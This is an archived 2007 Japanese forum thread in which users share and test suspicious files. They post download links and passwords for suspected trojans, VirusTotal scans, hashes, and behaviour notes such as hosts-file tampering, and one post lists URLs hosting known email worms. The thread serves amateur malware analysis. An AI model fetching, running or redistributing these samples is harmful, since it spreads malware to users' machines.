あやしいファイルを実行するスレ

このエントリーをはてなブックマークに追加
613名無しさん@お腹いっぱい。
ttp://www8.axfc.net/uploader/15/so/N15_17000.zip.html
key:WinRAR
ttp://up3.viploader.net/mini/src/viploader114040.zip.html
key:ad-aware
614名無しさん@お腹いっぱい。:2007/02/27(火) 08:14:34
crack.wrar37b.exe - TROJ_AGENT.VAP
aaw6jp_Setup.exe - TSPY_LDPINCH.TF
615名無しさん@お腹いっぱい。:2007/02/27(火) 10:29:38
Trojan-Downloader.Win32.Agent.auv
crack.wrar37b.exe

Trojan-PSW.Win32.LdPinch.bnk
aaw6jp_Setup.exe
616名無しさん@お腹いっぱい。:2007/02/27(火) 11:08:34
Complete scanning result of "CRACK.WRAR37B.zip", processed in VirusTotal at 02/27/2007 03:03:15 (CET).

[ file data ]
* name: CRACK.WRAR37B.zip
* size: 129259
* md5.: 81c2ade466bf4533952dd86f45685546
* sha1: 85841c0f585ff0cf34675083160f75177dc14d28

[ scan result ]
AntiVir 7.3.1.38/20070226 found [TR/Dldr.Agent.auv.16]
Authentium 4.93.8/20070226 found [W32/Downloader.BDAU]
AVG 386/20070225 found [Downloader.Agent.IQJ]
eSafe 7.0.14.0/20070227 found [Win32.Agent.auv]
Ewido 4.0/20070226 found [Downloader.Agent.auv]
F-Prot 4.3.1.45/20070226 found [W32/Downloader.BDAU]
F-Secure 6.70.13030.0/20070227 found [Trojan-Downloader.Win32.Agent.auv]
Fortinet 2.85.0.0/20070226 found [W32/Agent.AUV!tr.dldr]
Ikarus T3.1.1.3/20070226 found [Trojan-Downloader.Win32.Agent.auv]
Kaspersky 4.0.2.24/20070227 found [Trojan-Downloader.Win32.Agent.auv]
NOD32v2 2082/20070226 found [Win32/TrojanDownloader.Agent.NJC]
Norman 5.80.02/20070226 found [W32/DLoader.dam]
Panda 9.0.0.4/20070226 found [Trj/Downloader.MZB]
Prevx1 V2/20070227 found [Dropper.Payload]
TheHacker 6.1.6.065/20070226 found [Trojan/Downloader.Agent.auv]
VBA32 3.11.2/20070226 found [Trojan-Downloader.Win32.Agent.auv]
617名無しさん@お腹いっぱい。:2007/02/27(火) 11:10:24
Complete scanning result of "AAW6JP_SETUP.zip", processed in VirusTotal at 02/27/2007 02:48:20 (CET).

[ file data ]
* name: AAW6JP_SETUP.zip
* size: 255547
* md5.: 39e3083a87feee3d7b1e61fe351ffc49
* sha1: a7f775df4107421dfb8ee1c1e7a3be4c1cfae4e0

[ scan result ]
AntiVir 7.3.1.38/20070226 found [TR/Crypt.XPACK.Gen]
Authentium 4.93.8/20070226 found [could be a corrupted executable file]
AVG 386/20070225 found [PSW.Ldpinch.EOZ]
CAT-QuickHeal 9.00/20070226 found [(Suspicious) - DNAScan]
eSafe 7.0.14.0/20070227 found [Win32.LdPinch.bnk]
Ewido 4.0/20070226 found [Trojan.LdPinch.bnk]
F-Secure 6.70.13030.0/20070227 found [Trojan-PSW.Win32.LdPinch.bnk]
Fortinet 2.85.0.0/20070226 found [W32/LdPinch.BNK!tr.pws]
Ikarus T3.1.1.3/20070226 found [Trojan-PWS.Win32.LdPinch.bnk]
Kaspersky 4.0.2.24/20070227 found [Trojan-PSW.Win32.LdPinch.bnk]
NOD32v2 2082/20070226 found [Win32/PSW.LdPinch.BNK]
Norman 5.80.02/20070226 found [W32/LdPinch.HPL]
Panda 9.0.0.4/20070226 found [Suspicious file]
Sunbelt 2.2.907.0/20070224 found [VIPRE.Suspicious]
TheHacker 6.1.6.065/20070226 found [Trojan/PSW.LdPinch.bnk]
UNA 1.83/20070226 found [Win32.CRYPT.virus]
VBA32 3.11.2/20070226 found [Trojan-PSW.Win32.LdPinch.bnk]
VirusBuster 4.3.19:9/20070226 found nothing
618名無しさん@お腹いっぱい。:2007/02/27(火) 11:12:02
↑スマソ、VirusBuster 4.3.19:9/20070226 found nothing
消し忘れた。
619名無しさん@お腹いっぱい。:2007/02/28(水) 15:10:10
ぁゃιぃ
620名無しさん@お腹いっぱい。:2007/03/02(金) 03:09:05
ロリヲタ
621名無しさん@お腹いっぱい。:2007/03/09(金) 23:41:45
ネタが
622名無しさん@お腹いっぱい。:2007/03/09(金) 23:43:34
ない
623名無しさん@お腹いっぱい。:2007/03/10(土) 13:09:53
あげ
624名無しさん@お腹いっぱい。:2007/03/12(月) 18:43:59
今日ネトラン買ったらこのスレからネタひろってんな
モスキート悪用促進してんじゃねーよ
625名無しさん@お腹いっぱい。:2007/03/12(月) 19:18:04
>>624
犯罪行為堂々と推薦してる雑誌ですから
626名無しさん@お腹いっぱい。:2007/03/12(月) 19:47:48
まじか
627名無しさん@お腹いっぱい。:2007/03/12(月) 23:10:33
>>624
今に始まったこっちゃねぇ
628名無しさん@お腹いっぱい。:2007/03/13(火) 02:10:53
>>624
kwsk
629名無しさん@お腹いっぱい。:2007/03/13(火) 19:32:24
p88
630名無しさん@お腹いっぱい。:2007/03/13(火) 20:56:06
わたくし、とあるカルト団体の批判をmixiでやってるんですが、
怪しいファイルがメールで届けられたんです。
本来なら掲示板のログのはずなんですが、
拡張子がない。
それから、goo mailからダウンロードするたびにファイル名が変わる。
http://kuro33.sakura.ne.jp/kuro-up/index.html
kuro_0264.txt
これでございます。
パスはnews

どなたかお力をお貸しください。
631630:2007/03/13(火) 20:56:50
ちなみに、拡張子は便宜的に適当につけたものです。
632名無しさん@お腹いっぱい。:2007/03/13(火) 21:16:38
ネトランもホンと馬鹿者が多いな。
633名無しさん@お腹いっぱい。:2007/03/13(火) 23:15:06
何で 上祐史浩のmixiが こんなとこに貼ってあんだよw
634名無しさん@お腹いっぱい。:2007/03/13(火) 23:23:59
諸先輩方の検証を頂きたいのですが、下記URLは楽器の
tab譜が充実しているサイトだと思います。S&Gの「The BOXER」
を検索すると、Windowsが何かをDLしようとします。
すぐキャンセルしますが、nortonもウィルスの反応し
問題を解決してくれました。便利なサイトなので利用
したいのですが、止めた方がいいでしょうか?
それとも利用するに当たり注意する方法があれば
教えていただけないでしょうか?
635634:2007/03/13(火) 23:25:25
すみません、URLを書くのを忘れました。

これです。
ttp://www.911tabs.com/bands/t/
636名無しさん@お腹いっぱい。:2007/03/13(火) 23:29:59
意味が分からん。俺もよくそこ利用するけど勝手にDLなんてされないよ。
ポップアップはひたすら閉じてればいいだけど。
637634:2007/03/13(火) 23:43:31
>>636
ありがとう。上記のメインページは問題なく検索先に問題が
あるか、何かを間違えてクリックしたのかも知れません。
638名無しさん@お腹いっぱい。:2007/03/14(水) 19:49:52
up.uppple.com/src/up2551.jpg
トロイらしいんですが詳しくわかりますか?
639名無しさん@お腹いっぱい。:2007/03/14(水) 20:03:40
ttp://up.uppple.com/src/up2551.jpg
もう消えてるから分からんw
640名無しさん@お腹いっぱい。:2007/03/14(水) 20:39:19
>>639
トロイというか、何でもありのブラクラ系だな。
iframe 多数でどっかから、ウイルスとかスパイウェアと呼び込んでるかも。
後、mailto、telnet、FDDアタック、concon、無限ウィンドウオープン等々。
拡張子jpgだが、中身html。
641名無しさん@お腹いっぱい。:2007/03/16(金) 00:09:23
http://www.filecroc.com/filecroc101.exe
インストールおねがい!
642名無しさん@お腹いっぱい。:2007/03/16(金) 00:33:12
↓おねがい!
643名無しさん@お腹いっぱい。:2007/03/16(金) 03:28:53
ttp://kissho1.xii.jp/7/src/7jyou1418.avi
これで変なタスクバーアイコンをゲットしました。
644名無しさん@お腹いっぱい。:2007/03/16(金) 16:56:37
>>643
7jyou1418.avi - infected by Trojan.JS.WindowBomb.g
645名無しさん@お腹いっぱい。:2007/03/16(金) 17:27:11
>>643
   1.文件名:7jyou1418.avi
   不是病毒
646名無しさん@お腹いっぱい。:2007/03/16(金) 18:03:39
>>643
aviだと思って定義ファイル未更新のNorton2005で踏んだから死んだ。
647名無しさん@お腹いっぱい。:2007/03/16(金) 22:18:37
>>641
TR/VB.WY.17@AntiVir PersonalEdition Classic

ttp://www.avira.com/en/threats/section/vdfhistory/vdf_no/6.38.00.67/6.38.00.67.html?term=TR/VB.WY.17

VDF6.38.00.67で対応したとか書いてあるけど、実際は6.38.00.66で検知できてる。
さすがドイツ!
648名無しさん@お腹いっぱい。:2007/03/16(金) 22:26:13
>>647
filecrocってP2Pだろ。
実はトロイなの?
649名無しさん@お腹いっぱい。:2007/03/16(金) 22:46:48
うちのantivir反応しねえぞ
vtではsunbeltのみ反応したけどsunbeltだからねえ…
http://www.virustotal.com/vt/en/resultadof?d676f0c6df3b4600b63a998c21e743c6

インスコする気にはならんけど
650名無しさん@お腹いっぱい。:2007/03/16(金) 22:51:55
トップページには100% CLEAN NO SPYWARE、 NO ADWARE 、NO POPUPS て書いてある。
651名無しさん@お腹いっぱい。:2007/03/18(日) 01:04:31
http://company-crime.myeweb.net

Aviraのアラートでまくるけど、それすり抜けてTelenetが外部にアクセス始めるは、
OEにアカウント作成してサーバに繋ごうとする。さらにPIFファイルまでDLしようとする。
((((;゜д゜)))ガクガクブルブル



ほんと?
ぁゃιぃhtmlを実行してみる勇者キボンヌ
652名無しさん@お腹いっぱい。:2007/03/18(日) 01:26:10
トップページには何も無い
落としてメモ帳ででも中身見てみろ

有害なのはこっち
悪意のあるサイトを適当に呼び出す
company-crime.myeweb.net/window_dressing/

>それすり抜けてTelenetが外部にアクセス始めるは、OEにアカウント〜
↓を呼び出すため
www.hellplant.org/cgi-bin/xoor/serpent.cgi

>さらにPIFファイルまでDLしようとする
www.abisource.com/mailinglists/abiword-dev/2005/Jun/att-0006/phone_number2.pif
「Email-Worm.Win32.NetSky.t」
seti.sentry.net/archive/bioastro/2003/Feb/att-0025/Document003.pif
「Email-Worm.Win32.Sobig.a」
lists.w3.org/Archives/Public/site-comments/2003Aug/att-0008/movie0045.pif
「Email-Worm.Win32.Sobig.f」
lists.suse.com/archive/suse-sparc/2004-Jan/att-0009/message.pif
「Email-Worm.Win32.Mydoom.a」
lists.w3.org/Archives/Public/www-dom/2001OctDec/att-0204/sensitive.pif
「Email-Worm.Win32.Magistr.b」
等など以下略
653名無しさん@お腹いっぱい。:2007/03/18(日) 01:38:17
.pifってめずらしいな
拡張子表示されないんだっけ
654名無しさん@お腹いっぱい。:2007/03/18(日) 10:47:18
>>651
今いってみたら何も残っていなかったわけだが
655名無しさん@お腹いっぱい。:2007/03/18(日) 11:42:40
>>652
ウィルスのオンパレードだ((((;゚Д゚)))ガクガクブルブル
でも有名どころだから対応はしてると思うけど。
656名無しさん@お腹いっぱい。:2007/03/18(日) 19:11:26
>>651
最近は、日本でも海外でも独自のドメインも簡単にとれて、サーバーも手軽に借りれるから、
ものの1時間もあれば、別のURLでまた出現するかも。
657名無しさん@お腹いっぱい。:2007/03/19(月) 04:37:05
ttp://xtp0001.s3.x-beat.com/cgi-bin/up/source/Sonata_21789.jpg

これも色々読み込まれるっぽい
658名無しさん@お腹いっぱい。:2007/03/19(月) 05:12:16
>>657
紫だからすでに踏んでた^^;

-- 「2007/03/18 10:58」のキャッシュをチェックしています。 --
※このアドレスは危険URLのひとつです。
注意!ループタグを発見! (1)
注意!逃げウィンドウを発見! (1)
ブラクラチェックが終了しました。

※ ジャンプタグを発見しました。(1)
※ このページは自動的にリロードされるようです。
※ windowオープンを発見しました。(5)
※ プラグインデータを発見しました。(1)
http://www.thepocket.com/wavs/moneypit3.wav
※ インラインフレームタグを発見しました。 (134)
http://anycracks.com/
http://www.kuronowish.net/links/
http://blueslyrics.tripod.com/artistswithsongs/gary_moore_1.htm
http://www.geocities.com/fuzoku_ou/index.htm
http://www.matureobsesion.com/indexnc.php
※ 隠しスクリプトを発見しました。(1)
http://x8.ninpou.jp/ufo/109915201
上記アドレスのチェックもお勧めします。(そのままチェックできます。)
※ 注意!一部タグが大量に使われています。
[このアドレスの安全度 0%]
659名無しさん@お腹いっぱい。:2007/03/19(月) 05:30:46
>>657
ウイルスいっぱい
鑑定スレでさんざん既出
660名無しさん@お腹いっぱい。:2007/03/24(土) 20:30:22
            _|_
          /_\
           ̄|U ̄  
   ∧_∧    /ミヽ、 
   ( ・ω・)  ノミシ三 `~゚
   (っ ≡つ=つ゚  ゚ 
   ./   ) ババババ
   ( / ̄∪

            _|_
          /_\
  ヒュン       ̄|U ̄  
 ∧_∧ _∧  /ミヽ、 
((( ・ω・)三ω・) ノ ヽ  `~゚ ))
  (_っっ= _っっ゚   ゚ 
   ヽ   ノ ヒュン
   ( / ̄∪
661名無しさん@お腹いっぱい。:2007/03/25(日) 22:07:31
http://doiob.net/doiob/uploader/src/up1166.zip

ブログ版をPDFファイルにしてみました。
縦書きにしています。
Adobe Readerで読んでください。

いきなり不足してるフォントをダウンロードに行きますので、
慌てないでください。

************

これ、何度か見かけたのだが
あからさまに怪しいが自分で解凍する勇気は無い
662名無しさん@お腹いっぱい。:2007/03/25(日) 22:53:18
>>661
403ですよー
663名無しさん@お腹いっぱい。:2007/03/26(月) 04:44:06
過疎ってるな
664名無しさん@お腹いっぱい。:2007/03/28(水) 06:21:26
Winnyを狙ったワーム・ニュイルス情報 Part60
ttp://tmp6.2ch.net/test/read.cgi/download/1170937127/534
にあがってた未検知ファイルをAntiVirに送ってたんだけど、
2msn.exeだけ

The file '2msn.exe' has been determined to be 'CLEAN'.
Our analysts did not discovered any malicious content.
と言われた

3/10時点でのvirustotalのSSは、
ttp://up.uppple.com/src/up2585.png

俺の環境では、踏む気になれないので、勇気のある人(?)実行たのむ
ttp://up.uppple.com/upload.cgi?mode=dl&file=2584
vip
665名無しさん@お腹いっぱい。:2007/03/28(水) 06:57:19
なんも起きんかった
実行ファイルの挙動や動作のログを取ってくれるツールってなかったっけ?
どこにファイル追加した、とかここのレジストリいじった、とか
あまりにも使わないんでどっかいってしまった
666名無しさん@お腹いっぱい。:2007/03/28(水) 07:04:47
>>665
砂箱のことか?
667名無しさん@お腹いっぱい。:2007/03/28(水) 07:15:43
>>666
ファイルの実行それ自体を阻止するとかじゃなくて、ただ挙動を調べるだけ
確かそのツールをかまして起動させるような感じだった
そんなSandBoxあった?
668名無しさん@お腹いっぱい。:2007/03/28(水) 07:27:58
Total Uninstall とか かな
ttp://cowscorpion.com/Registry/totaluninstall.html

この手のやつは得られる情報が多すぎて
中々しっくりくる物が見つからなくて困ってる
669名無しさん@お腹いっぱい。:2007/03/28(水) 08:23:55
>>665 thx
Backdoor Trojan Downloader ってのは誤検出で
Aviraのanalystsが正しいってことでおk(?)かな
そもそも、うp主が何のファイルを上げていたのかも分からないが…(^^
670名無しさん@お腹いっぱい。:2007/03/28(水) 08:24:17
>>668
そか、これでも一応できるか
前に利用してたのはインストール不要でもっちょっと軽かった
少し思い出して探してみるわ
671名無しさん@お腹いっぱい。:2007/03/29(木) 13:56:03
**雑音**

* INTEL製品を頼まれもしないのに擁護/マンセーしライバル製品を攻撃する
* 主にAMD製CPU叩きとNOD32及びPestPatrol以外のソフト叩きに異様に執着
* セキュ板、自作PC、PC一般、DTV板、情報システム板、まれにプログラマ板などに出没
* C言語プログラミングはおろかSIMD(MMX,SSEなどの処理系)をSIMMと書き続け、 超超超初級
プログラム問題さえも解けない、完全なプログラミング素人
* BlackIc、Prescotte、シンプルオブベスト、チッンボチップ、骨髄反射、MEMTEST86+で/onecpu、OutLock、ゴミグス、アントネトバ、クアッドPU、ニーと、低商品電力、95umから65umにシュリンク、風評努力など想像を絶する間違いを犯す。
 結論:頭がおかしい。
* ある自分の無知を晒して以来名無し、別コテで自作自演
* 虫を必死に連呼(連呼するのが雑音なのでわかりやすい)

ttp://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
ttp://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php

近況や出没情報はこちらに

【動機は?】雑音犬畜生Part37【●持ち】
http://tmp6.2ch.net/test/read.cgi/tubo/1167055200/

一日中、目が開いてる間ずっと、自分じゃロクに買いもしない
Intelを讃えてAMDを敵視し、自演と自滅の繰り返し・・・

ホント、そろそろ本当の“動機”を語ってほしいぞ。
よっぽどの、恨みつらみがあるんだろうから。

逆恨みなのは、もうみんな分ってるけどねw
672名無しさん@お腹いっぱい。:2007/03/29(木) 19:45:31
ここで自分の使っているアンチウイルスの検出力をテストせよ
http://pc11.2ch.net/test/read.cgi/sec/1174461579/
673名無しさん@お腹いっぱい。:2007/03/30(金) 09:10:24
バカが自分勝手に遊んでるだけで調査になってない
検出力などAV-ComparativesやVB100%のような専門機関がスレ結果だけで十分
674名無しさん@お腹いっぱい。:2007/03/30(金) 09:12:14
あーあ、スレ結果だって、する結果だ
まぁそもそも実行するスレと何の関係もないんで、下らないスレ貼るなよ
675名無しさん@お腹いっぱい。:2007/03/30(金) 11:38:26
>>674
セキュリティ板の各スレに手当たり次第に書き込んでいるだけの
かわいそうな人なので、やさしく放っておいてあげて下さい
676名無しさん@お腹いっぱい。:2007/03/31(土) 13:04:22
http://www.dotup.org/uploda/www.dotup.org6925.zip.html
p:virus

ウイルスでしょうか
677名無しさん@お腹いっぱい。:2007/03/31(土) 14:19:08
あっちのスレの連中に聞け
678名無しさん@お腹いっぱい。:2007/03/31(土) 15:37:09
ttp://2ch-news.net/up/up53900.png
マイナーばかりが、検出
なんか、ぁゃιぃ…
679名無しさん@お腹いっぱい。:2007/03/31(土) 16:07:29
>>676
実行したらexeファイルに感染しまくり
680名無しさん@お腹いっぱい。:2007/03/31(土) 18:55:41
C:\WINDOWS\System32\BASSMOD.dllけしとけ
681名無しさん@お腹いっぱい。:2007/03/31(土) 18:59:28
>>679
kwsk
682名無しさん@お腹いっぱい。:2007/04/01(日) 05:37:18
http://www.abisource.com/mailinglists/abiword-dev/2005/Jun/att-0006/phone_number2.pif
http://www.cumsshut.com/
http://sakuratan.ddo.jp/uploader/source/date35978.lzh
683名無しさん@お腹いっぱい。:2007/04/01(日) 06:09:21
3つめはスキャンしないほうが良い
684名無しさん@お腹いっぱい。:2007/04/02(月) 06:05:55
これは大丈夫でしょうか?

http://imepita.jp/20070313/664490
685名無しさん@お腹いっぱい。:2007/04/02(月) 07:36:14
>>684
スレ違い

勇気が無くて見られない画像解説スレ Part845
http://etc6.2ch.net/test/read.cgi/entrance/1175217796/
686名無しさん@お腹いっぱい。:2007/04/04(水) 00:07:38
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
のRunがなくてExplorerなんだけどどうしたらいいんでしょうか
687名無しさん@お腹いっぱい。:2007/04/04(水) 01:07:08
>>686
スレ違い

【エスパー】超初心者の質問に答えるスレ458【マヅレス】
http://pc11.2ch.net/test/read.cgi/pc/1175587830/
688名無しさん@お腹いっぱい。:2007/04/05(木) 16:12:10
某所で拾ったファイル(元名-ジャケット(長い空白).exe)
virustotalの結果は、どこも検知しなかった
実行お願いします
ttp://2ch-news.net/up/up55312.png
ttp://2ch-news.net/up/up55310.zip.html
vip
689名無しさん@お腹いっぱい。:2007/04/05(木) 21:11:18
tempになにやら.batを追加
690名無しさん@お腹いっぱい。:2007/04/05(木) 21:59:21
>>689 thanxです
どこも検知せずフォルダアイコン・空白.exeだったんで
新種か?と思ったんですが、PCには影響なさそうですか?
失敗ウイルスか何かでしょうかね?
691名無しさん@お腹いっぱい。:2007/04/05(木) 22:55:46
Filename Result
jacket.exe MALWARE

The file 'jacket.exe' has been determined to be 'MALWARE'. Our analysts discovered that the file is a Trojan.
In general this kind of programs contains harmful functionality called payload.
Detection will be added to our virus definition file (VDF) with one of the next updates.

by AVIRA
692半角の鑑定人:2007/04/05(木) 23:04:07
jacket.exeを実行して作られるファイルは下記
:C:\Documents and Settings\Owner\Recent\jacket.lnk
:C:\Documents and Settings\Owner\Recent\ジャケット_001.jpg.lnk
:C:\WINDOWS\Prefetch\JACKET.EXE-2C51C580.pf

あとはレジストリの HKEY_CURRENT_USE に Cache が作られるだけ。

女の子のジャケット画像が出てくるだけです。
システムやレジの重要な部分には一切触れません。
PC無害です。

>>691
直踏み検証結果ですか?
693名無しさん@お腹いっぱい。:2007/04/05(木) 23:08:57
んや
実行めんどいんでAVIRAにおくっただけ
694名無しさん@お腹いっぱい。:2007/04/05(木) 23:13:25
Winny.exeやらどっかの掲示板のURLやらが書かれているから
暴露か自動書き込み関係と思ったけど

作成者の意図通りに動作してないのかも
695半角の鑑定人:2007/04/05(木) 23:24:10
AVIRAでペイロードを検出したみたいですから
694サンの言うとおりで 作成者の意図通りに動作してないのでしょうね。
一応 通信もNEGiESで見たんですけど特に目立った通信は無いようです。
何度踏んでも>>692の結果です。
696688:2007/04/05(木) 23:38:09
>>691 thanx
今メール見たら、Aviraから返事が来てました
こんなに速く来るのは珍しいので驚いてます
>>半角の鑑定人さん
検証 thanxです
>>694
>作成者の意図通りに動作してないのかも
やはり、そんな感じもしますが
一応、皆さんお気をつけてください
697名無しさん@お腹いっぱい。:2007/04/05(木) 23:48:57
お気を付けもなにもこんなもん踏みようがねえよ
698名無しさん@お腹いっぱい。:2007/04/07(土) 06:41:10
>>664
ダウンロード後に出るDriveCleanerの詐欺広告のほうがウザス
699名無しさん@お腹いっぱい。:2007/04/08(日) 06:07:10
>>688
送信日時 : 2007年4月6日 21:07:20
Hello.
New malicious software was found in the attached file
(Email-Flooder.Win32.Agent.e).
700699:2007/04/08(日) 06:13:21
by かすぺ
701名無しさん@お腹いっぱい。:2007/04/08(日) 20:45:35
実行して検証しただけじゃ完全に挙動把握できるわけじゃない
ポリモーフイック型なんかだとカスペラボでも解析に1週間はかかるんだとさ
702名無しさん@お腹いっぱい。:2007/04/13(金) 09:41:02
http://kissho.xii.jp/1/src/1jyou3143.avi

偽装ぽいので鑑定よろ
703名無しさん@お腹いっぱい。:2007/04/13(金) 09:42:36
鑑定スレへどうぞ
704名無しさん@お腹いっぱい。:2007/04/13(金) 09:57:02
>>703
鑑定スレじゃ詳しくは判明しなかったので…
マルチぽいですが是非お願いしたいのです。
705名無しさん@お腹いっぱい。:2007/04/13(金) 10:14:24
>>704
転載

ウイルス&男の笑い声でした
AVGで以下を検出
Exploit.wmfが3つ
Exploit.aniが2つ
トロイ色々が4つ
スクリプトウイルスが1つ
PC有害 
706名無しさん@お腹いっぱい。:2007/04/13(金) 10:34:50
Loveletterて・・・懐かしすぎ。
707名無しさん@お腹いっぱい。:2007/04/18(水) 15:16:18
過疎りすぎw
708名無しさん@お腹いっぱい。:2007/04/18(水) 15:48:19
∧_∧
( ´・ω・)
( つ旦O
と_)_)
709名無しさん@お腹いっぱい。:2007/04/21(土) 06:06:54
2chCloserってどーよ
ttp://www16.plala.or.jp/spichilz/soft13.html
710名無しさん@お腹いっぱい。:2007/04/21(土) 11:07:52
>>709
暇だったんで実行してみようかなとダウソしてみたら
2chCloser.exeを カスペがTrojan.Win32.Delf.abeとして検知。
多分 トロイと同じ様な動きをするんだろな
711名無しさん@お腹いっぱい。:2007/04/21(土) 16:47:13
>>710
俺もカスペだから反応したけど、微妙だね……。
ttp://ehoba.mydns.jp/loada/src2/tfxup0334.png
712710:2007/04/21(土) 18:34:07
>>711
カスペを遮断して実行してみた。
hostsファイルの改ざんがありますね。
あとは 2chCloserを起動監視した状態でタスクマネージャで強制終了させても
自分自身のコピーが復活します。
ここでカスペを実行させると Trojan.Win32.Qhost.leとBackdoor.Win32.Agent.anfを検知しました。
山田オルタナティブの亜種との事。どうもservise.exeが同じ様な働きをするみたいですね。
713名無しさん@お腹いっぱい。:2007/04/22(日) 07:33:18
フォルダが2chになってる場所も開くと問答無用で閉じるw
オプションの監視対象に、レジストリエディタ、タスクマネージャ、システム構成ユーティリティも
ttp://up.uppple.com/src/up3215.png


全てのオプションをチェックした状態の2chCloserと改変されたhostファイル
ttp://up.uppple.com/upload.cgi?mode=dl&file=3216
DLKey:2ch
714名無しさん@お腹いっぱい。:2007/04/22(日) 09:36:18
ダウンロードしてみました。
「host 10KB」ファイルはWindowsのHOSTSファイルを改変します。
その結果 2ch関係がが「localhost」への接続になり、接続できなくなります。
以下が、改変されるアドレス(全リストははるかに長くなります)の例があります。
127.0.0.1 2ch.net
127.0.0.1 www.2ch.net
127.0.0.1 www2.2ch.net
127.0.0.1 www2b.2ch.net
127.0.0.1 www2f1.2ch.net

このhostsファイルはTrojan.Win32.Qhostの亜種( .le)としてカスペルスキーが検知しました。
ですが 接続を拒否するために使用するのであれば無害なファイルです。
715名無しさん@お腹いっぱい。:2007/04/23(月) 00:50:46
   シュボッ         キャノン版(笑)もうやだ・・・
       ., ∧_∧
      []() (・ω・` )      l二ヽ
       □と    ) ̄⊃     ) )
      ⊂ (_(_つ   ̄⊃  / ̄ ̄ ̄ヽ
       ⊂_      ._⊃   | (\/) |
         ⊂__⊃.      |  > <  |
                     | (/\). |
                     ヽ___/
716名無しさん@お腹いっぱい。:2007/04/28(土) 17:39:24
winpt42n_7C6C6C0F.dll
という1kのファイルがsystem32に作られてたんだけど、何これ?
717名無しさん@お腹いっぱい。:2007/04/29(日) 02:02:10
434 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/04/29(日) 01:59:08
勇者さんいますか?
いたらお仕事ですwww

124 名前:萌える名無し画像[sage masami] 投稿日:2007/04/28(土) 22:46:26 ID:sWFHMRli0
http://kissho.sytes.net/5000zz/upload.cgi?mode=dl&file=4661

 ↑
これウィルスですか?
それとも単なるaviファイル?
意味分からんですと

http://pie.bbspink.com/test/read.cgi/girls/1177489031/124-
http://etc6.2ch.net/test/read.cgi/qa/1176034702/724


因みにノートン入れてるPCは反応する
718名無しさん@お腹いっぱい。:2007/04/29(日) 07:39:11
解凍すると「新しいフォルダ」「新しいフォルダ2」を作成

「新しいフォルダ」
・「[CM] ロッテ ガーナミルクチョコレート(母の日宣言07篇) 60秒.avi」 CM動画。無害
・Thumbs.db 無害

「新しいフォルダ2」
・test.exe Trojan.Win32.Haradong.ap
719名無しさん@お腹いっぱい。:2007/04/29(日) 07:49:23
原田さんキタ━━━━━(゚∀゚)━━━━━ !!!!!
720名無しさん@お腹いっぱい。:2007/04/29(日) 07:54:59
これ、ここ二〜三日格スレに貼られたらき☆すたウイルスじゃない?
721名無しさん@お腹いっぱい。:2007/04/29(日) 07:57:44
原田の方のみ
ttp://www.uploda.org/uporg790984.zip.html
DL:harada

実行したい人、各所に通報したい人どぞ
722名無しさん@お腹いっぱい。:2007/04/29(日) 08:03:00
追記

「test.exe」
サイズ 147,456
MD5 bb9b7e71bf62fdd81d63fdc46dca6247
723名無しさん@お腹いっぱい。:2007/04/29(日) 08:22:16
>>718
これはカスペで引っかかったのかな?
724名無しさん@お腹いっぱい。:2007/04/29(日) 09:19:34
>>723
カスペ(及びカスペエンジンのアンチウイルス)
落とした時には既に対応していたから、誰か通報したんじゃないかな

シマンテックは最初からかな
725あああ:2007/04/29(日) 17:06:09
ここか?
726えええ:2007/04/29(日) 20:14:36
何が?
727名無しさん@お腹いっぱい。:2007/04/30(月) 11:10:51
http://www.virustotal.com/
ここでスキャンしても、”es mayor”としか表示されません。
どうしてでしょう。 何回やっても同じです。
728んんん:2007/04/30(月) 17:20:55
何が?
729名無しさん@お腹いっぱい。:2007/04/30(月) 17:28:20
>>727
容量オーバーじゃね?
730名無しさん@お腹いっぱい。:2007/05/04(金) 00:07:58
保守っ

       *'``・* 。
        |     `*。
       ,。∩A_A  _*
      + (o・ _ ・o)/∠ +゚
      `*。 ヽ、  つ/*゚* みんな集まれ〜
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚
731名無しさん@お腹いっぱい。:2007/05/04(金) 12:19:46
もうどうにでもな〜れ                    もうどうにでもな〜れ
 もうどうにでもな〜れ                  もうどうにでもな〜れ
  もうどうにでもな〜れ                もうどうにでもな〜れ
   もうどうにでもな〜れ              もうどうにでもな〜れ
    もうどうにでもな〜れ            もうどうにでもな〜れ
     もうどうにでもな〜れ          もうどうにでもな〜れ
      もうどうにでもな〜れ        もうどうにでもな〜れ
       もうどうにでもな〜れ      もうどうにでもな〜れ
                    *'``・* 。
                    |     `*
もうどうにでもな〜れ     ,。∩∧_∧   * .   もうどうにでもな〜れ
もうどうにでもな〜れ    + (´・ω・`) *。+゚    もうどうにでもな〜れ
もうどうにでもな〜れ    `*。 ヽ、  つ *゚*    もうどうにでもな〜れ
                   `・+。*・' ゚⊃ +゚
                   ☆   ∪~ 。*゚
                    `・+。*・ ゚
       もうどうにでもな〜れ      もうどうにでもな〜れ
      もうどうにでもな〜れ        もうどうにでもな〜れ
     もうどうにでもな〜れ          もうどうにでもな〜れ
    もうどうにでもな〜れ            もうどうにでもな〜れ
   もうどうにでもな〜れ              もうどうにでもな〜れ
  もうどうにでもな〜れ                もうどうにでもな〜れ
 もうどうにでもな〜れ                  もうどうにでもな〜れ
もうどうにでもな〜れ                    もうどうにでもな〜れ
732名無しさん@お腹いっぱい。:2007/05/05(土) 21:05:51
人いますか?
お暇な方お願いします。Registry Repair Doctorなるソフトです。
ttp://www.malwaresweeper.com/download/msrd.exe
他怪しいものが沢山と配布されてるみたいですが
ttp://www.malwaresweeper.com/download.html

よろしくおね
733名無しさん@お腹いっぱい。:2007/05/14(月) 18:21:13
      ∧_∧
     (´・ω・) < ほしゅ
     ( O┬O    きこきこ〜〜〜
    ◎-∪'┴◎
734名無しさん@お腹いっぱい。:2007/05/18(金) 00:50:02
このスレも過疎スレに…
ここから拾ってきて実行すればOKw

【信者】検出可否報告スレ2【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1177848342/
735名無しさん@お腹いっぱい。:2007/05/18(金) 09:09:13
自分で新種見つけて、実行してるからなぁ……
736名無しさん@お腹いっぱい。:2007/05/18(金) 10:52:51
>>734
このスレはNOD厨の自演
737名無しさん@お腹いっぱい。:2007/05/21(月) 21:49:01
>>736
>>736
>>736
>>736
>>736
>>736
>>736
>>736
738名無しさん@お腹いっぱい。:2007/06/10(日) 17:41:58
ageますよ
